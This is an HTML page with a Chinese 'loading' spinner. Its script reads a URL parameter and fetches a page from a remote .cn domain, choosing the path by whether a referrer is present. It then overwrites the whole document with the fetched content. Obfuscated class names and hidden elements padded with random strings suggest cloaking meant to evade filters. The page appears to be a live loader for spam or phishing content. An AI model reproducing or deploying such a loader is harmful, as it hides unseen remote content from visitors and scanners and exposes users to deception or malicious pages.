<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .zS7lwX0VN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .zS7lwX0VN .aP9DCX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .zS7lwX0VN .content {
            line-height: 50px;
            text-align: center
        }

        .zS7lwX0VN .img {
            width: 100%
        }

        .zS7lwX0VN .SstlmnbE7kM {
            text-align: center
        }

        .zS7lwX0VN .SstlmnbE7kM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .zS7lwX0VN .SstlmnbE7kM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .zS7lwX0VN .SstlmnbE7kM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .zS7lwX0VN .SstlmnbE7kM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .zS7lwX0VN .SstlmnbE7kM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .zS7lwX0VN .SstlmnbE7kM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .zS7lwX0VN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function g0XUEgTfFap(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var VgDHFzU = g0XUEgTfFap('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ VgDHFzU +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ VgDHFzU +".html?a=share";
		}
		
        eSI35wsY=url+"#"+new Date().getTime();
        eSI35wsY && function() {
            $.get(eSI35wsY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >juMAuorPz82</b>
<span style='display:none'>A3Sk4B10PJrg4xRYN3TjRvUCvz6Shn7cPymt81kcmlGi5j1BE8Uaja0ZUSZ3KpoSFfp5TOWqbBpgBHzlC</span>
<span style='display:none'>A3Sk4B10PJrg4xRYN3TjRvUCvz6Shn7cPymt81kcmlGi5j1BE8Uaja0ZUSZ3KpoSFfp5TOWqbBpgBHzlC</span>
<a  href='#' style='display:none'>adu6dU8Xrv45vmbOZJbwFheF6CVDcoyISfoYdM1wXpvYrwLf5ObgTmXhqM7j70i3QOQ436YLKChFg0AzZUtkP1aukNOGcv42CteI</a>
<a  href='#' style='display:none'>adu6dU8Xrv45vmbOZJbwFheF6CVDcoyISfoYdM1wXpvYrwLf5ObgTmXhqM7j70i3QOQ436YLKChFg0AzZUtkP1aukNOGcv42CteI</a>
<img  src='' style='display:none'>
<li style='display:none' >pH7qxOcLcWbPf8d3eFFNN8cOIp6RzwgLLhxnrWHrenB1jytDt7I3qUEubCZYcwmDS551ae1RXBZ</li>
<h1 style='display:none' >l31QwdHWF2XZMundtxTLaT7A0Ua1MAKXOpsySImo6kKNTOXS6cL2V2j</h1><div class="zS7lwX0VN">
    <div class="aP9DCX">
        <div class="SstlmnbE7kM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >jpFDbfGe1A4mwJDcVx3fPHCJHVXwF</li>
<ul style='display:none' >ZexCCC8T54mvFj8Y6uGqka9qkc3EOV81yA1rV1iVpbfMKwsTrJWSdYX4Cdib8Yb</ul>
<li style='display:none' >jpFDbfGe1A4mwJDcVx3fPHCJHVXwF</li>
<a  href='#' style='display:none'>UAOUKwomkIsRnGmlAOs</a>
<li style='display:none' >jpFDbfGe1A4mwJDcVx3fPHCJHVXwF</li>
<div style='display:none'>OPjFHm8B3j7CMYvyH4vIeem90Glu6oKBtFgPQHGFwQeu2PDDKY8hFwEheE6ZuLHNeAuVa3cK2be</div>
<a  href='#' style='display:none'>UAOUKwomkIsRnGmlAOs</a></body>
</html>